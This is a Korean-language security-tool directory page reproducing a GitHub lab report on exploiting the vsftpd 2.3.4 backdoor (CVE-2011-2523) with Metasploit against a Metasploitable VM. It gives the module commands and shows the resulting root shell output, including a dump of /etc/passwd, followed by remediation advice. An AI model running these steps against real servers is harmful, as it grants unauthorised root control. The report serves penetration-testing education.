Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
vsftpd-234-vuln-report — vsftpd 2.3.4 (CVE-2011-2523)의 취약점 평가 및 Metasploit을 사용한 익스플로잇. 전체 보고서 및 루트 액세스 증거 포함. | Kitploit
도구/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Exploit FrameworksVulnerability AnalysisExploitationPenetration TestingLearning & EducationPayload Development
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

vsftpd 2.3.4 (CVE-2011-2523)의 취약점 평가 및 Metasploit을 사용한 익스플로잇. 전체 보고서 및 루트 액세스 증거 포함.

저장소 보기
21년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

💥 vsftpd 2.3.4 백도어 익스플로잇 보고서

Metasploit을 사용한 vsftpd 2.3.4의 알려진 취약점 악용

📌 대상 세부 정보

  • 대상 IP: 192.168.150.133
  • 서비스: FTP
  • 취약한 버전: vsftpd 2.3.4
  • 익스플로잇 모듈: exploit/unix/ftp/vsftpd_234_backdoor
  • 페이로드: 명령 셸 (TCP)

🔍 취약점 요약

vsftpd 2.3.4에는 특수하게 조작된 사용자 이름(:)로 끝나는)이 수신될 때 포트 6200에서 명령 셸을 여는 악성 백도어가 포함되어 있습니다.

CVE: CVE-2011-2523


🚀 익스플로잇 단계

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 셸 액세스 획득:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 영향

루트 셸 액세스로 공격자는 대상 시스템에 대한 완전한 제어권을 얻습니다. 여기에는 권한 상승, 측면 이동, 데이터 유출, 지속적인 접근 유지 등이 포함됩니다.


✅ 권장 사항

  • vsftpd 2.3.4를 사용하지 마십시오.
  • 안전하고 지원되는 버전으로 업그레이드하십시오.
  • FTP에 대한 외부 액세스를 제한하십시오.
  • 포트 6200에서 의심스러운 트래픽을 모니터링하십시오.

📄 보고서

📝 전체 PDF 보고서는 이 저장소에 있습니다: vsftpd-exploit-report.pdf


📚 참고 자료

  • Rapid7 모듈 정보
  • CVE-2011-2523 - NVD

👨‍💻 작성자

🔥 by vedpakhare 제작

도구 다운로드